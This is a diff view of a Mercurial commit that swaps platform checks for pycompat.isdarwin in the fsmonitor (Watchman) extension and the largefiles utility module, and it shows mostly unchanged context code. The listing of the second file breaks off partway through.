##// END OF EJS Templates
codemod: use pycompat.isdarwin...
Jun Wu -
r34648:dacfcdd8 default
parent child Browse files
Show More
@@ -1,803 +1,803 b''
1 1 # __init__.py - fsmonitor initialization and overrides
2 2 #
3 3 # Copyright 2013-2016 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
9 9
10 10 Integrates the file-watching program Watchman with Mercurial to produce faster
11 11 status results.
12 12
13 13 On a particular Linux system, for a real-world repository with over 400,000
14 14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
15 15 system, with fsmonitor it takes about 0.3 seconds.
16 16
17 17 fsmonitor requires no configuration -- it will tell Watchman about your
18 18 repository as necessary. You'll need to install Watchman from
19 19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
20 20
21 21 The following configuration options exist:
22 22
23 23 ::
24 24
25 25 [fsmonitor]
26 26 mode = {off, on, paranoid}
27 27
28 28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
29 29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
30 30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
31 31 and ensure that the results are consistent.
32 32
33 33 ::
34 34
35 35 [fsmonitor]
36 36 timeout = (float)
37 37
38 38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
39 39 to return results. Defaults to `2.0`.
40 40
41 41 ::
42 42
43 43 [fsmonitor]
44 44 blacklistusers = (list of userids)
45 45
46 46 A list of usernames for which fsmonitor will disable itself altogether.
47 47
48 48 ::
49 49
50 50 [fsmonitor]
51 51 walk_on_invalidate = (boolean)
52 52
53 53 Whether or not to walk the whole repo ourselves when our cached state has been
54 54 invalidated, for example when Watchman has been restarted or .hgignore rules
55 55 have been changed. Walking the repo in that case can result in competing for
56 56 I/O with Watchman. For large repos it is recommended to set this value to
57 57 false. You may wish to set this to true if you have a very fast filesystem
58 58 that can outpace the IPC overhead of getting the result data for the full repo
59 59 from Watchman. Defaults to false.
60 60
61 61 fsmonitor is incompatible with the largefiles and eol extensions, and
62 62 will disable itself if any of those are active.
63 63
64 64 '''
65 65
66 66 # Platforms Supported
67 67 # ===================
68 68 #
69 69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
70 70 # even under severe loads.
71 71 #
72 72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
73 73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
74 74 # user testing under normal loads.
75 75 #
76 76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
77 77 # very little testing has been done.
78 78 #
79 79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
80 80 #
81 81 # Known Issues
82 82 # ============
83 83 #
84 84 # * fsmonitor will disable itself if any of the following extensions are
85 85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
86 86 # * fsmonitor will produce incorrect results if nested repos that are not
87 87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
88 88 #
89 89 # The issues related to nested repos and subrepos are probably not fundamental
90 90 # ones. Patches to fix them are welcome.
91 91
92 92 from __future__ import absolute_import
93 93
94 94 import codecs
95 95 import hashlib
96 96 import os
97 97 import stat
98 98 import sys
99 99 import weakref
100 100
101 101 from mercurial.i18n import _
102 102 from mercurial.node import (
103 103 hex,
104 104 nullid,
105 105 )
106 106
107 107 from mercurial import (
108 108 context,
109 109 encoding,
110 110 error,
111 111 extensions,
112 112 localrepo,
113 113 merge,
114 114 pathutil,
115 115 pycompat,
116 116 registrar,
117 117 scmutil,
118 118 util,
119 119 )
120 120 from mercurial import match as matchmod
121 121
122 122 from . import (
123 123 pywatchman,
124 124 state,
125 125 watchmanclient,
126 126 )
127 127
128 128 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
129 129 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
130 130 # be specifying the version(s) of Mercurial they are tested with, or
131 131 # leave the attribute unspecified.
132 132 testedwith = 'ships-with-hg-core'
133 133
134 134 configtable = {}
135 135 configitem = registrar.configitem(configtable)
136 136
137 137 configitem('fsmonitor', 'mode',
138 138 default='on',
139 139 )
140 140 configitem('fsmonitor', 'walk_on_invalidate',
141 141 default=False,
142 142 )
143 143 configitem('fsmonitor', 'timeout',
144 144 default='2',
145 145 )
146 146 configitem('fsmonitor', 'blacklistusers',
147 147 default=list,
148 148 )
149 149
150 150 # This extension is incompatible with the following blacklisted extensions
151 151 # and will disable itself when encountering one of these:
152 152 _blacklist = ['largefiles', 'eol']
153 153
154 154 def _handleunavailable(ui, state, ex):
155 155 """Exception handler for Watchman interaction exceptions"""
156 156 if isinstance(ex, watchmanclient.Unavailable):
157 157 if ex.warn:
158 158 ui.warn(str(ex) + '\n')
159 159 if ex.invalidate:
160 160 state.invalidate()
161 161 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
162 162 else:
163 163 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
164 164
165 165 def _hashignore(ignore):
166 166 """Calculate hash for ignore patterns and filenames
167 167
168 168 If this information changes between Mercurial invocations, we can't
169 169 rely on Watchman information anymore and have to re-scan the working
170 170 copy.
171 171
172 172 """
173 173 sha1 = hashlib.sha1()
174 174 sha1.update(repr(ignore))
175 175 return sha1.hexdigest()
176 176
177 177 _watchmanencoding = pywatchman.encoding.get_local_encoding()
178 178 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
179 179 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
180 180
181 181 def _watchmantofsencoding(path):
182 182 """Fix path to match watchman and local filesystem encoding
183 183
184 184 watchman's paths encoding can differ from filesystem encoding. For example,
185 185 on Windows, it's always utf-8.
186 186 """
187 187 try:
188 188 decoded = path.decode(_watchmanencoding)
189 189 except UnicodeDecodeError as e:
190 190 raise error.Abort(str(e), hint='watchman encoding error')
191 191
192 192 try:
193 193 encoded = decoded.encode(_fsencoding, 'strict')
194 194 except UnicodeEncodeError as e:
195 195 raise error.Abort(str(e))
196 196
197 197 return encoded
198 198
199 199 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
200 200 '''Replacement for dirstate.walk, hooking into Watchman.
201 201
202 202 Whenever full is False, ignored is False, and the Watchman client is
203 203 available, use Watchman combined with saved state to possibly return only a
204 204 subset of files.'''
205 205 def bail():
206 206 return orig(match, subrepos, unknown, ignored, full=True)
207 207
208 208 if full or ignored or not self._watchmanclient.available():
209 209 return bail()
210 210 state = self._fsmonitorstate
211 211 clock, ignorehash, notefiles = state.get()
212 212 if not clock:
213 213 if state.walk_on_invalidate:
214 214 return bail()
215 215 # Initial NULL clock value, see
216 216 # https://facebook.github.io/watchman/docs/clockspec.html
217 217 clock = 'c:0:0'
218 218 notefiles = []
219 219
220 220 def fwarn(f, msg):
221 221 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
222 222 return False
223 223
224 224 def badtype(mode):
225 225 kind = _('unknown')
226 226 if stat.S_ISCHR(mode):
227 227 kind = _('character device')
228 228 elif stat.S_ISBLK(mode):
229 229 kind = _('block device')
230 230 elif stat.S_ISFIFO(mode):
231 231 kind = _('fifo')
232 232 elif stat.S_ISSOCK(mode):
233 233 kind = _('socket')
234 234 elif stat.S_ISDIR(mode):
235 235 kind = _('directory')
236 236 return _('unsupported file type (type is %s)') % kind
237 237
238 238 ignore = self._ignore
239 239 dirignore = self._dirignore
240 240 if unknown:
241 241 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
242 242 # ignore list changed -- can't rely on Watchman state any more
243 243 if state.walk_on_invalidate:
244 244 return bail()
245 245 notefiles = []
246 246 clock = 'c:0:0'
247 247 else:
248 248 # always ignore
249 249 ignore = util.always
250 250 dirignore = util.always
251 251
252 252 matchfn = match.matchfn
253 253 matchalways = match.always()
254 254 dmap = self._map._map
255 255 nonnormalset = getattr(self, '_nonnormalset', None)
256 256
257 257 copymap = self._map.copymap
258 258 getkind = stat.S_IFMT
259 259 dirkind = stat.S_IFDIR
260 260 regkind = stat.S_IFREG
261 261 lnkkind = stat.S_IFLNK
262 262 join = self._join
263 263 normcase = util.normcase
264 264 fresh_instance = False
265 265
266 266 exact = skipstep3 = False
267 267 if match.isexact(): # match.exact
268 268 exact = True
269 269 dirignore = util.always # skip step 2
270 270 elif match.prefix(): # match.match, no patterns
271 271 skipstep3 = True
272 272
273 273 if not exact and self._checkcase:
274 274 # note that even though we could receive directory entries, we're only
275 275 # interested in checking if a file with the same name exists. So only
276 276 # normalize files if possible.
277 277 normalize = self._normalizefile
278 278 skipstep3 = False
279 279 else:
280 280 normalize = None
281 281
282 282 # step 1: find all explicit files
283 283 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
284 284
285 285 skipstep3 = skipstep3 and not (work or dirsnotfound)
286 286 work = [d for d in work if not dirignore(d[0])]
287 287
288 288 if not work and (exact or skipstep3):
289 289 for s in subrepos:
290 290 del results[s]
291 291 del results['.hg']
292 292 return results
293 293
294 294 # step 2: query Watchman
295 295 try:
296 296 # Use the user-configured timeout for the query.
297 297 # Add a little slack over the top of the user query to allow for
298 298 # overheads while transferring the data
299 299 self._watchmanclient.settimeout(state.timeout + 0.1)
300 300 result = self._watchmanclient.command('query', {
301 301 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
302 302 'since': clock,
303 303 'expression': [
304 304 'not', [
305 305 'anyof', ['dirname', '.hg'],
306 306 ['name', '.hg', 'wholename']
307 307 ]
308 308 ],
309 309 'sync_timeout': int(state.timeout * 1000),
310 310 'empty_on_fresh_instance': state.walk_on_invalidate,
311 311 })
312 312 except Exception as ex:
313 313 _handleunavailable(self._ui, state, ex)
314 314 self._watchmanclient.clearconnection()
315 315 return bail()
316 316 else:
317 317 # We need to propagate the last observed clock up so that we
318 318 # can use it for our next query
319 319 state.setlastclock(result['clock'])
320 320 if result['is_fresh_instance']:
321 321 if state.walk_on_invalidate:
322 322 state.invalidate()
323 323 return bail()
324 324 fresh_instance = True
325 325 # Ignore any prior noteable files from the state info
326 326 notefiles = []
327 327
328 328 # for file paths which require normalization and we encounter a case
329 329 # collision, we store our own foldmap
330 330 if normalize:
331 331 foldmap = dict((normcase(k), k) for k in results)
332 332
333 333 switch_slashes = pycompat.ossep == '\\'
334 334 # The order of the results is, strictly speaking, undefined.
335 335 # For case changes on a case insensitive filesystem we may receive
336 336 # two entries, one with exists=True and another with exists=False.
337 337 # The exists=True entries in the same response should be interpreted
338 338 # as being happens-after the exists=False entries due to the way that
339 339 # Watchman tracks files. We use this property to reconcile deletes
340 340 # for name case changes.
341 341 for entry in result['files']:
342 342 fname = entry['name']
343 343 if _fixencoding:
344 344 fname = _watchmantofsencoding(fname)
345 345 if switch_slashes:
346 346 fname = fname.replace('\\', '/')
347 347 if normalize:
348 348 normed = normcase(fname)
349 349 fname = normalize(fname, True, True)
350 350 foldmap[normed] = fname
351 351 fmode = entry['mode']
352 352 fexists = entry['exists']
353 353 kind = getkind(fmode)
354 354
355 355 if not fexists:
356 356 # if marked as deleted and we don't already have a change
357 357 # record, mark it as deleted. If we already have an entry
358 358 # for fname then it was either part of walkexplicit or was
359 359 # an earlier result that was a case change
360 360 if fname not in results and fname in dmap and (
361 361 matchalways or matchfn(fname)):
362 362 results[fname] = None
363 363 elif kind == dirkind:
364 364 if fname in dmap and (matchalways or matchfn(fname)):
365 365 results[fname] = None
366 366 elif kind == regkind or kind == lnkkind:
367 367 if fname in dmap:
368 368 if matchalways or matchfn(fname):
369 369 results[fname] = entry
370 370 elif (matchalways or matchfn(fname)) and not ignore(fname):
371 371 results[fname] = entry
372 372 elif fname in dmap and (matchalways or matchfn(fname)):
373 373 results[fname] = None
374 374
375 375 # step 3: query notable files we don't already know about
376 376 # XXX try not to iterate over the entire dmap
377 377 if normalize:
378 378 # any notable files that have changed case will already be handled
379 379 # above, so just check membership in the foldmap
380 380 notefiles = set((normalize(f, True, True) for f in notefiles
381 381 if normcase(f) not in foldmap))
382 382 visit = set((f for f in notefiles if (f not in results and matchfn(f)
383 383 and (f in dmap or not ignore(f)))))
384 384
385 385 if nonnormalset is not None and not fresh_instance:
386 386 if matchalways:
387 387 visit.update(f for f in nonnormalset if f not in results)
388 388 visit.update(f for f in copymap if f not in results)
389 389 else:
390 390 visit.update(f for f in nonnormalset
391 391 if f not in results and matchfn(f))
392 392 visit.update(f for f in copymap
393 393 if f not in results and matchfn(f))
394 394 else:
395 395 if matchalways:
396 396 visit.update(f for f, st in dmap.iteritems()
397 397 if (f not in results and
398 398 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
399 399 visit.update(f for f in copymap if f not in results)
400 400 else:
401 401 visit.update(f for f, st in dmap.iteritems()
402 402 if (f not in results and
403 403 (st[2] < 0 or st[0] != 'n' or fresh_instance)
404 404 and matchfn(f)))
405 405 visit.update(f for f in copymap
406 406 if f not in results and matchfn(f))
407 407
408 408 audit = pathutil.pathauditor(self._root, cached=True).check
409 409 auditpass = [f for f in visit if audit(f)]
410 410 auditpass.sort()
411 411 auditfail = visit.difference(auditpass)
412 412 for f in auditfail:
413 413 results[f] = None
414 414
415 415 nf = iter(auditpass).next
416 416 for st in util.statfiles([join(f) for f in auditpass]):
417 417 f = nf()
418 418 if st or f in dmap:
419 419 results[f] = st
420 420
421 421 for s in subrepos:
422 422 del results[s]
423 423 del results['.hg']
424 424 return results
425 425
426 426 def overridestatus(
427 427 orig, self, node1='.', node2=None, match=None, ignored=False,
428 428 clean=False, unknown=False, listsubrepos=False):
429 429 listignored = ignored
430 430 listclean = clean
431 431 listunknown = unknown
432 432
433 433 def _cmpsets(l1, l2):
434 434 try:
435 435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
436 436 fn = encoding.environ['FSMONITOR_LOG_FILE']
437 437 f = open(fn, 'wb')
438 438 else:
439 439 fn = 'fsmonitorfail.log'
440 440 f = self.opener(fn, 'wb')
441 441 except (IOError, OSError):
442 442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
443 443 return
444 444
445 445 try:
446 446 for i, (s1, s2) in enumerate(zip(l1, l2)):
447 447 if set(s1) != set(s2):
448 448 f.write('sets at position %d are unequal\n' % i)
449 449 f.write('watchman returned: %s\n' % s1)
450 450 f.write('stat returned: %s\n' % s2)
451 451 finally:
452 452 f.close()
453 453
454 454 if isinstance(node1, context.changectx):
455 455 ctx1 = node1
456 456 else:
457 457 ctx1 = self[node1]
458 458 if isinstance(node2, context.changectx):
459 459 ctx2 = node2
460 460 else:
461 461 ctx2 = self[node2]
462 462
463 463 working = ctx2.rev() is None
464 464 parentworking = working and ctx1 == self['.']
465 465 match = match or matchmod.always(self.root, self.getcwd())
466 466
467 467 # Maybe we can use this opportunity to update Watchman's state.
468 468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
469 469 # the workingctx that is to be committed. So don't update the state in
470 470 # that case.
471 471 # HG_PENDING is set in the environment when the dirstate is being updated
472 472 # in the middle of a transaction; we must not update our state in that
473 473 # case, or we risk forgetting about changes in the working copy.
474 474 updatestate = (parentworking and match.always() and
475 475 not isinstance(ctx2, (context.workingcommitctx,
476 476 context.memctx)) and
477 477 'HG_PENDING' not in encoding.environ)
478 478
479 479 try:
480 480 if self._fsmonitorstate.walk_on_invalidate:
481 481 # Use a short timeout to query the current clock. If that
482 482 # takes too long then we assume that the service will be slow
483 483 # to answer our query.
484 484 # walk_on_invalidate indicates that we prefer to walk the
485 485 # tree ourselves because we can ignore portions that Watchman
486 486 # cannot and we tend to be faster in the warmer buffer cache
487 487 # cases.
488 488 self._watchmanclient.settimeout(0.1)
489 489 else:
490 490 # Give Watchman more time to potentially complete its walk
491 491 # and return the initial clock. In this mode we assume that
492 492 # the filesystem will be slower than parsing a potentially
493 493 # very large Watchman result set.
494 494 self._watchmanclient.settimeout(
495 495 self._fsmonitorstate.timeout + 0.1)
496 496 startclock = self._watchmanclient.getcurrentclock()
497 497 except Exception as ex:
498 498 self._watchmanclient.clearconnection()
499 499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
500 500 # boo, Watchman failed. bail
501 501 return orig(node1, node2, match, listignored, listclean,
502 502 listunknown, listsubrepos)
503 503
504 504 if updatestate:
505 505 # We need info about unknown files. This may make things slower the
506 506 # first time, but whatever.
507 507 stateunknown = True
508 508 else:
509 509 stateunknown = listunknown
510 510
511 511 if updatestate:
512 512 ps = poststatus(startclock)
513 513 self.addpostdsstatus(ps)
514 514
515 515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
516 516 listsubrepos)
517 517 modified, added, removed, deleted, unknown, ignored, clean = r
518 518
519 519 if not listunknown:
520 520 unknown = []
521 521
522 522 # don't do paranoid checks if we're not going to query Watchman anyway
523 523 full = listclean or match.traversedir is not None
524 524 if self._fsmonitorstate.mode == 'paranoid' and not full:
525 525 # run status again and fall back to the old walk this time
526 526 self.dirstate._fsmonitordisable = True
527 527
528 528 # shut the UI up
529 529 quiet = self.ui.quiet
530 530 self.ui.quiet = True
531 531 fout, ferr = self.ui.fout, self.ui.ferr
532 532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
533 533
534 534 try:
535 535 rv2 = orig(
536 536 node1, node2, match, listignored, listclean, listunknown,
537 537 listsubrepos)
538 538 finally:
539 539 self.dirstate._fsmonitordisable = False
540 540 self.ui.quiet = quiet
541 541 self.ui.fout, self.ui.ferr = fout, ferr
542 542
543 543 # clean isn't tested since it's set to True above
544 544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
545 545 rv2)
546 546 modified, added, removed, deleted, unknown, ignored, clean = rv2
547 547
548 548 return scmutil.status(
549 549 modified, added, removed, deleted, unknown, ignored, clean)
550 550
551 551 class poststatus(object):
552 552 def __init__(self, startclock):
553 553 self._startclock = startclock
554 554
555 555 def __call__(self, wctx, status):
556 556 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
557 557 hashignore = _hashignore(wctx.repo().dirstate._ignore)
558 558 notefiles = (status.modified + status.added + status.removed +
559 559 status.deleted + status.unknown)
560 560 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
561 561
562 562 def makedirstate(repo, dirstate):
563 563 class fsmonitordirstate(dirstate.__class__):
564 564 def _fsmonitorinit(self, repo):
565 565 # _fsmonitordisable is used in paranoid mode
566 566 self._fsmonitordisable = False
567 567 self._fsmonitorstate = repo._fsmonitorstate
568 568 self._watchmanclient = repo._watchmanclient
569 569 self._repo = weakref.proxy(repo)
570 570
571 571 def walk(self, *args, **kwargs):
572 572 orig = super(fsmonitordirstate, self).walk
573 573 if self._fsmonitordisable:
574 574 return orig(*args, **kwargs)
575 575 return overridewalk(orig, self, *args, **kwargs)
576 576
577 577 def rebuild(self, *args, **kwargs):
578 578 self._fsmonitorstate.invalidate()
579 579 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
580 580
581 581 def invalidate(self, *args, **kwargs):
582 582 self._fsmonitorstate.invalidate()
583 583 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
584 584
585 585 if dirstate._ui.configbool(
586 586 "experimental", "fsmonitor.wc_change_notify"):
587 587 def setparents(self, p1, p2=nullid):
588 588 with state_update(self._repo, name="hg.wc_change",
589 589 oldnode=self._pl[0], newnode=p1,
590 590 partial=False):
591 591 return super(fsmonitordirstate, self).setparents(p1, p2)
592 592
593 593 dirstate.__class__ = fsmonitordirstate
594 594 dirstate._fsmonitorinit(repo)
595 595
596 596 def wrapdirstate(orig, self):
597 597 ds = orig(self)
598 598 # only override the dirstate when Watchman is available for the repo
599 599 if util.safehasattr(self, '_fsmonitorstate'):
600 600 makedirstate(self, ds)
601 601 return ds
602 602
603 603 def extsetup(ui):
604 604 extensions.wrapfilecache(
605 605 localrepo.localrepository, 'dirstate', wrapdirstate)
606 if pycompat.sysplatform == 'darwin':
606 if pycompat.isdarwin:
607 607 # An assist for avoiding the dangling-symlink fsevents bug
608 608 extensions.wrapfunction(os, 'symlink', wrapsymlink)
609 609
610 610 extensions.wrapfunction(merge, 'update', wrapupdate)
611 611
612 612 def wrapsymlink(orig, source, link_name):
613 613 ''' if we create a dangling symlink, also touch the parent dir
614 614 to encourage fsevents notifications to work more correctly '''
615 615 try:
616 616 return orig(source, link_name)
617 617 finally:
618 618 try:
619 619 os.utime(os.path.dirname(link_name), None)
620 620 except OSError:
621 621 pass
622 622
623 623 class state_update(object):
624 624 ''' This context manager is responsible for dispatching the state-enter
625 625 and state-leave signals to the watchman service. The enter and leave
626 626 methods can be invoked manually (for scenarios where context manager
627 627 semantics are not possible). If parameters oldnode and newnode are None,
628 628 they will be populated based on current working copy in enter and
629 629 leave, respectively. Similarly, if the distance is none, it will be
630 630 calculated based on the oldnode and newnode in the leave method.'''
631 631
632 632 def __init__(self, repo, name, oldnode=None, newnode=None, distance=None,
633 633 partial=False):
634 634 self.repo = repo.unfiltered()
635 635 self.name = name
636 636 self.oldnode = oldnode
637 637 self.newnode = newnode
638 638 self.distance = distance
639 639 self.partial = partial
640 640 self._lock = None
641 641 self.need_leave = False
642 642
643 643 def __enter__(self):
644 644 self.enter()
645 645
646 646 def enter(self):
647 647 # We explicitly need to take a lock here, before we proceed to update
648 648 # watchman about the update operation, so that we don't race with
649 649 # some other actor. merge.update is going to take the wlock almost
650 650 # immediately anyway, so this is effectively extending the lock
651 651 # around a couple of short sanity checks.
652 652 if self.oldnode is None:
653 653 self.oldnode = self.repo['.'].node()
654 654 self._lock = self.repo.wlock()
655 655 self.need_leave = self._state(
656 656 'state-enter',
657 657 hex(self.oldnode))
658 658 return self
659 659
660 660 def __exit__(self, type_, value, tb):
661 661 abort = True if type_ else False
662 662 self.exit(abort=abort)
663 663
664 664 def exit(self, abort=False):
665 665 try:
666 666 if self.need_leave:
667 667 status = 'failed' if abort else 'ok'
668 668 if self.newnode is None:
669 669 self.newnode = self.repo['.'].node()
670 670 if self.distance is None:
671 671 self.distance = calcdistance(
672 672 self.repo, self.oldnode, self.newnode)
673 673 self._state(
674 674 'state-leave',
675 675 hex(self.newnode),
676 676 status=status)
677 677 finally:
678 678 self.need_leave = False
679 679 if self._lock:
680 680 self._lock.release()
681 681
682 682 def _state(self, cmd, commithash, status='ok'):
683 683 if not util.safehasattr(self.repo, '_watchmanclient'):
684 684 return False
685 685 try:
686 686 self.repo._watchmanclient.command(cmd, {
687 687 'name': self.name,
688 688 'metadata': {
689 689 # the target revision
690 690 'rev': commithash,
691 691 # approximate number of commits between current and target
692 692 'distance': self.distance if self.distance else 0,
693 693 # success/failure (only really meaningful for state-leave)
694 694 'status': status,
695 695 # whether the working copy parent is changing
696 696 'partial': self.partial,
697 697 }})
698 698 return True
699 699 except Exception as e:
700 700 # Swallow any errors; fire and forget
701 701 self.repo.ui.log(
702 702 'watchman', 'Exception %s while running %s\n', e, cmd)
703 703 return False
704 704
705 705 # Estimate the distance between two nodes
706 706 def calcdistance(repo, oldnode, newnode):
707 707 anc = repo.changelog.ancestor(oldnode, newnode)
708 708 ancrev = repo[anc].rev()
709 709 distance = (abs(repo[oldnode].rev() - ancrev)
710 710 + abs(repo[newnode].rev() - ancrev))
711 711 return distance
712 712
713 713 # Bracket working copy updates with calls to the watchman state-enter
714 714 # and state-leave commands. This allows clients to perform more intelligent
715 715 # settling during bulk file change scenarios
716 716 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
717 717 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
718 718 mergeancestor=False, labels=None, matcher=None, **kwargs):
719 719
720 720 distance = 0
721 721 partial = True
722 722 oldnode = repo['.'].node()
723 723 newnode = repo[node].node()
724 724 if matcher is None or matcher.always():
725 725 partial = False
726 726 distance = calcdistance(repo.unfiltered(), oldnode, newnode)
727 727
728 728 with state_update(repo, name="hg.update", oldnode=oldnode, newnode=newnode,
729 729 distance=distance, partial=partial):
730 730 return orig(
731 731 repo, node, branchmerge, force, ancestor, mergeancestor,
732 732 labels, matcher, **kwargs)
733 733
734 734 def reposetup(ui, repo):
735 735 # We don't work with largefiles or inotify
736 736 exts = extensions.enabled()
737 737 for ext in _blacklist:
738 738 if ext in exts:
739 739 ui.warn(_('The fsmonitor extension is incompatible with the %s '
740 740 'extension and has been disabled.\n') % ext)
741 741 return
742 742
743 743 if repo.local():
744 744 # We don't work with subrepos either.
745 745 #
746 746 # if repo[None].substate can cause a dirstate parse, which is too
747 747 # slow. Instead, look for a file called hgsubstate,
748 748 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
749 749 return
750 750
751 751 fsmonitorstate = state.state(repo)
752 752 if fsmonitorstate.mode == 'off':
753 753 return
754 754
755 755 try:
756 756 client = watchmanclient.client(repo)
757 757 except Exception as ex:
758 758 _handleunavailable(ui, fsmonitorstate, ex)
759 759 return
760 760
761 761 repo._fsmonitorstate = fsmonitorstate
762 762 repo._watchmanclient = client
763 763
764 764 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
765 765 if cached:
766 766 # at this point since fsmonitorstate wasn't present,
767 767 # repo.dirstate is not a fsmonitordirstate
768 768 makedirstate(repo, dirstate)
769 769
770 770 class fsmonitorrepo(repo.__class__):
771 771 def status(self, *args, **kwargs):
772 772 orig = super(fsmonitorrepo, self).status
773 773 return overridestatus(orig, self, *args, **kwargs)
774 774
775 775 if ui.configbool("experimental", "fsmonitor.transaction_notify"):
776 776 def transaction(self, *args, **kwargs):
777 777 tr = super(fsmonitorrepo, self).transaction(
778 778 *args, **kwargs)
779 779 if tr.count != 1:
780 780 return tr
781 781 stateupdate = state_update(self, name="hg.transaction")
782 782 stateupdate.enter()
783 783
784 784 class fsmonitortrans(tr.__class__):
785 785 def _abort(self):
786 786 try:
787 787 result = super(fsmonitortrans, self)._abort()
788 788 finally:
789 789 stateupdate.exit(abort=True)
790 790 return result
791 791
792 792 def close(self):
793 793 try:
794 794 result = super(fsmonitortrans, self).close()
795 795 finally:
796 796 if self.count == 0:
797 797 stateupdate.exit()
798 798 return result
799 799
800 800 tr.__class__ = fsmonitortrans
801 801 return tr
802 802
803 803 repo.__class__ = fsmonitorrepo
@@ -1,673 +1,673 b''
1 1 # Copyright 2009-2010 Gregory P. Ward
2 2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 3 # Copyright 2010-2011 Fog Creek Software
4 4 # Copyright 2010-2011 Unity Technologies
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 '''largefiles utility code: must not import other modules in this package.'''
10 10 from __future__ import absolute_import
11 11
12 12 import copy
13 13 import hashlib
14 14 import os
15 15 import stat
16 16
17 17 from mercurial.i18n import _
18 18
19 19 from mercurial import (
20 20 dirstate,
21 21 encoding,
22 22 error,
23 23 httpconnection,
24 24 match as matchmod,
25 25 node,
26 26 pycompat,
27 27 scmutil,
28 28 sparse,
29 29 util,
30 30 vfs as vfsmod,
31 31 )
32 32
33 33 shortname = '.hglf'
34 34 shortnameslash = shortname + '/'
35 35 longname = 'largefiles'
36 36
37 37 # -- Private worker functions ------------------------------------------
38 38
39 39 def getminsize(ui, assumelfiles, opt, default=10):
40 40 lfsize = opt
41 41 if not lfsize and assumelfiles:
42 42 lfsize = ui.config(longname, 'minsize', default=default)
43 43 if lfsize:
44 44 try:
45 45 lfsize = float(lfsize)
46 46 except ValueError:
47 47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
48 48 % lfsize)
49 49 if lfsize is None:
50 50 raise error.Abort(_('minimum size for largefiles must be specified'))
51 51 return lfsize
52 52
53 53 def link(src, dest):
54 54 """Try to create hardlink - if that fails, efficiently make a copy."""
55 55 util.makedirs(os.path.dirname(dest))
56 56 try:
57 57 util.oslink(src, dest)
58 58 except OSError:
59 59 # if hardlinks fail, fallback on atomic copy
60 60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
61 61 for chunk in util.filechunkiter(srcf):
62 62 dstf.write(chunk)
63 63 os.chmod(dest, os.stat(src).st_mode)
64 64
65 65 def usercachepath(ui, hash):
66 66 '''Return the correct location in the "global" largefiles cache for a file
67 67 with the given hash.
68 68 This cache is used for sharing of largefiles across repositories - both
69 69 to preserve download bandwidth and storage space.'''
70 70 return os.path.join(_usercachedir(ui), hash)
71 71
72 72 def _usercachedir(ui):
73 73 '''Return the location of the "global" largefiles cache.'''
74 74 path = ui.configpath(longname, 'usercache', None)
75 75 if path:
76 76 return path
77 77 if pycompat.iswindows:
78 78 appdata = encoding.environ.get('LOCALAPPDATA',\
79 79 encoding.environ.get('APPDATA'))
80 80 if appdata:
81 81 return os.path.join(appdata, longname)
82 elif pycompat.sysplatform == 'darwin':
82 elif pycompat.isdarwin:
83 83 home = encoding.environ.get('HOME')
84 84 if home:
85 85 return os.path.join(home, 'Library', 'Caches', longname)
86 86 elif pycompat.isposix:
87 87 path = encoding.environ.get('XDG_CACHE_HOME')
88 88 if path:
89 89 return os.path.join(path, longname)
90 90 home = encoding.environ.get('HOME')
91 91 if home:
92 92 return os.path.join(home, '.cache', longname)
93 93 else:
94 94 raise error.Abort(_('unknown operating system: %s\n')
95 95 % pycompat.osname)
96 96 raise error.Abort(_('unknown %s usercache location') % longname)
97 97
98 98 def inusercache(ui, hash):
99 99 path = usercachepath(ui, hash)
100 100 return os.path.exists(path)
101 101
102 102 def findfile(repo, hash):
103 103 '''Return store path of the largefile with the specified hash.
104 104 As a side effect, the file might be linked from user cache.
105 105 Return None if the file can't be found locally.'''
106 106 path, exists = findstorepath(repo, hash)
107 107 if exists:
108 108 repo.ui.note(_('found %s in store\n') % hash)
109 109 return path
110 110 elif inusercache(repo.ui, hash):
111 111 repo.ui.note(_('found %s in system cache\n') % hash)
112 112 path = storepath(repo, hash)
